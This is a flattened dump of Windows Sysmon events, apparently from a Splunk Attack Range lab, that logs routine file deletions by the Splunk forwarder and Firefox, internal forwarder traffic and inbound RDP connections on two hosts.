AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECEFBCF1CE936C0038D0D90EF31F70CD,SHA256=24167C693645CB4153D0982D879CB135EE646F1CF0B343319DF59F825749B73A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980084Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:59.874{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A49C919BAD7A0143A25C266DF7CA34D,SHA256=46AD80F3C197F156F05E8E8DA1A284BF5357F1C2CAC221621CE5554FE9DCBF37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:59.006{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F9F4F82B86EE46D3AA331DCDFF1F0BE,SHA256=FEFBB38D01FBB1EEF3118C6FCEEE3793DC85EF2753E45AD3E1D8CEA5D615324E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:00.039{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82B77E9EC98C2CCCAAC83FF5636CC43A,SHA256=918F9986F337C587C26BE61F92192A0FEA3700E2842BB035EF77B1F7EC90A180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980085Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:01.109{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A012E0D2FD981E279EB807E21CD49B6,SHA256=73F6E1DDC5F8642230291C572E4CABF0225B675467B8988B480512BD9DCACE34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:01.793{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58396CD4163B3B2F6D38AAFFFBB9C0C0,SHA256=B538DF85BC8F0F8A3147B45003026F0A789ACE9DB82302C80E7C5C762F12A010,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:58.729{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53470-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:01.043{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=716D81341794F1938B40EC0B7B067816,SHA256=D135240B6C0B5D93D49FDF6A1218B64294A0FAF6BC5F2355DAF3B537E4473275,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980088Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:02.812{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=153432E6E3EC2355FFA97A75C1A873C8,SHA256=62FF2689846F760D88A950DC971881225FE3B68BD05231CD0F2CFFFB86A063F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980087Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:02.812{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09832A5708890C3B02E014AE1CED2CDE,SHA256=89B29215B6EA68535C0FDDDA0DF99F80393FE0651F316CB4D1742FD2E2AF3F0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980086Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:02.172{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=561E66187C1534B5FEE477D42B1345D3,SHA256=0FAEE0B329115D0060EDB8F84569A5553BC0822EA5319D5A1DA728DC6CFE13A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:02.077{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FE8AB69BEBFE68986AD39731EF8755E,SHA256=A28C15A85650163EA180D2C6FE4C110668D640A64BB3A28C7B74EC583001B6B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980092Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:03.283{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91E4396BFE47C84E8C59BAE791EFBC21,SHA256=D14E9D966E0155BC33583B93B2C3061A6CEA0FF8FBB35AAED4E971A4554431A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:03.094{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7048366358F2959DB17321BBB3D915FB,SHA256=48A6BB449645DEBBEBFED9B4A606EA4630C503BFAE33B1D9F2D6C1F40A88FE6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980091Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:59.951{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52667-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980090Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:59.890{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52633-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980089Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:58.871{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59457-false10.0.1.12-8000- 354300x80000000000000001051749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:00.711{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54016-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:00.137{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-50248-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000980094Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:04.299{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB22469CC18CCADA9463A57F4007725B,SHA256=9B80EDACD19E2E8551FBBB4EDEC8B2C839240BD1B4ED03585A9918257DFA9BF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:04.097{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F754CC395C340DE73AF729D4FE8507B7,SHA256=B55C7A73826A361C768F68C199E1E56040F5DF7264B017B07507CCD6AD89B9B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980093Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:04.018{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=153432E6E3EC2355FFA97A75C1A873C8,SHA256=62FF2689846F760D88A950DC971881225FE3B68BD05231CD0F2CFFFB86A063F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980096Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:05.299{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B3562D671270A50A323B4514ED25794,SHA256=B7B3809280F91DECFFA36737484DBA2ABD7EACD7CCBDCBB3747D72AEFEA3E625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:05.128{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35E5DB67ECC41AEAD77DC0341CB641F6,SHA256=DB0710068D0E7EFF38DF71BD5E48F82624FB2F8D65D2F6BF0E508CFB624D705E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980095Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:01.810{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53875-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980097Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:06.315{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E60A2F0A8E3E709597AED851E96B9D,SHA256=5ACE644B2FAB1E6FA9E1B1B122950E6017EC1CFCCD2613EF2EC1CB84D34D327C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:06.311{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=953069D61F0635E1D392027838A1BAA7,SHA256=E27738415D79E4A9884208ECF206020AC5A0FE2946C4FB85F3D6E2E279B9722B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:06.311{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=2298D4379DDE2A2EB8D441A1207342EF,SHA256=21E146139DEC0513BB943F43EF2E107F757C1783D5B7BD6039573E099349F933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:06.311{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=6C5C79DC497772B0EFD5A69574D10AD8,SHA256=208620229DD23686D4CBE6572251EAB9389B9B8DE11FD1A950CCD758DC618436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:06.311{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=2D961FDF90B4A47918668C04CA0DFE3A,SHA256=33AC0DFAD0417DBEC1344579AF414E302A581F921A3AEC48C2A440A61FF20E1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:06.311{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=B346D8715BEC42E736F8B22AA9A24803,SHA256=E09519FA8ED7717DA9393DA5162FE1E81A4777E2D91F508CE53867FAB08FE8EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:06.311{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=8B5783E9C2D6E99DC611881EE1B6497B,SHA256=71A834A402275B3D7E6F5966A75E0274C76F63A7C057AC2AED96EB8A79E39098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:06.146{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA223D0656A16679FC26F674544E5895,SHA256=61DECC0FA44B4073F103F748D513064BE3930844082BF61862E723B1165DC1EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:03.873{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53471-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000980098Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:07.346{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66D7F05E2D5FFA80F54DAD5B610BE8A6,SHA256=55754BD2FA39FA2F5C121D1C1829D54671DCD8A71856C66C15F1638E3603E0D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:07.165{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16A071152C41615ACED1C2DF64736FD5,SHA256=441188BC2297631EBA1A492E0DB9F8A17B7FA3BA6915C57DC552454FEAEB4AD3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980100Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:04.812{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59458-false10.0.1.12-8000- 23542300x8000000000000000980099Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:08.346{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B304E24F027C02CD3B95AA5EC264C06F,SHA256=366A73B8EDF8D99DC86D194CACA3EF0D4EB0DFDD5967BB2CBD2A6FCEDC573C0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:08.169{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD09DD44BA753AA2526F07D0CC67C033,SHA256=0FEBAA440DF1356D5434499DDB246B07931E32D76784A066E651714F7F19F8AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980103Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:09.674{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F15CD93ED12EB7E3F86BB2AC52288DE3,SHA256=153A0675E5FABF5C5571D59DFFE6412FD0DD871B61EC3FCC6850711DBC4AC9F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980102Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:09.674{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A77DF3BE3EAA0CDF4F9B88E3D7EEBA14,SHA256=D2A58E6650B5F13486127AFC9F38B4CBC919F270215AF4CDF566A423C5C41503,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980101Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:09.361{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=565F439973275B83401E2D7E7A694FCE,SHA256=3E40765B11348F6C09DA8445F3FD1D219702596E8D1E6A8B3221490918178DE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:09.185{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CE7A6FB2F17B8B81FC3F5B6A6AB1377,SHA256=B906AFED60C98E772570FF61F9092F5ECDC3DFFBEA7650AF6D800B7B3EDB7CFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:10.200{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CD28626E142C2C74A1D7C1DEF46170D,SHA256=A105A819C5732D9F9EA5B52FE7EEB8DEE0F229D7D5F7457593940468CBC0145B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980105Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:06.956{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59908-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980104Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:10.377{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9301A65CFEF20FFA7A8EB2DE7F001A5E,SHA256=E35D037DDD1F612B38CA46FC3A6DADF4678E74A5FC2248A7A8521767C03F7E77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980106Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:11.393{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9245EFF7BC4B0F2188BF50D66160C75D,SHA256=93C7AA0E300590C7C9F7CC12A82523FC44FC105E02A1097707EFAA0B622B4742,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:09.838{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53472-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:11.204{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50BFB264EC9A25D32BE32A6DFE808FE0,SHA256=D546FD73923B7CEFBF0E488DBBC78FFA07F7A0BDFAE2BA2EE2DE0ADF5512021A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980108Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:12.910{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4314MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980107Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:12.393{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C032F9657EE9A9BF0BF59EC54702214,SHA256=2BA648B9A349FFD305A4AD1A266D25CDA32E36EABF8DFEF293184C42CA8362B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:12.387{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEAA866EE933822522EE86A5CAE0420F,SHA256=CC0F495A038EF29907FD51ED41A9D4CA9337BD3571954A762BA6F4E851020D2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:12.387{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E6EA168F26D9233110B4976112C1422,SHA256=B6B50DB8AE7AAC5FCC9A379BFEFF3B2218083FE8E6699E917FC065C6693B3FA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:12.234{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F89D61213470B9BD191A1F8378FB75F,SHA256=3DD25CDE7B25B2DD513E84B628438CB6DAA288C0523A0A3C0BE7AA32D5533A76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980111Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 